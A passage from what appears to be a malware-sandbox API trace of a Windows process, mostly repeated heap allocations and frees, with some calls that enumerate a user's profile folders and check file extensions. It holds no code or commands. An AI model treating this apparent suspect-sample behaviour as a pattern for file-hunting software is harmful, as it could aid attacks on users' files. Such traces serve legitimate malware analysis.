lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.702] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\PrintHood\\") returned="PrintHood\\" [0187.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0187.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.702] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0187.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0187.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.703] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0187.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.703] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0187.703] PathFindFileNameW (pszPath="") returned="" [0187.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.703] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\PrintHood\\*" (normalized: "c:\\users\\keecfmwgj\\printhood\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85824980, ftCreationTime.dwHighDateTime=0x1d8a3a1, ftLastAccessTime.dwLowDateTime=0x668dc460, ftLastAccessTime.dwHighDateTime=0x1d8a477, ftLastWriteTime.dwLowDateTime=0x668dc460, ftLastWriteTime.dwHighDateTime=0x1d8a477, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ymOmNEPhoB", cAlternateFileName="YMOMNE~1")) returned 0xffffffff [0187.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0187.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0187.706] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0187.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0187.706] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0187.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.708] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Recent\\") returned="Recent\\" [0187.708] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0187.708] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0187.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.708] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0187.708] PathFindFileNameW (pszPath="") returned="" [0187.708] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Recent\\*" (normalized: "c:\\users\\keecfmwgj\\recent\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85824980, ftCreationTime.dwHighDateTime=0x1d8a3a1, ftLastAccessTime.dwLowDateTime=0x668dc460, ftLastAccessTime.dwHighDateTime=0x1d8a477, ftLastWriteTime.dwLowDateTime=0x668dc460, ftLastWriteTime.dwHighDateTime=0x1d8a477, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ymOmNEPhoB", cAlternateFileName="YMOMNE~1")) returned 0xffffffff [0187.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0187.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0187.709] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0187.709] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0187.709] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Saved Games\\") returned="Saved Games\\" [0187.709] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0187.709] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0187.709] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0187.709] PathFindFileNameW (pszPath="") returned="" [0187.709] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Saved Games\\*" (normalized: "c:\\users\\keecfmwgj\\saved games\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0187.710] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0187.710] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0187.710] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Saved Games\\desktop.ini") returned=".ini" [0187.710] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0187.710] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0187.710] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0187.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0187.710] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0187.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0187.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: 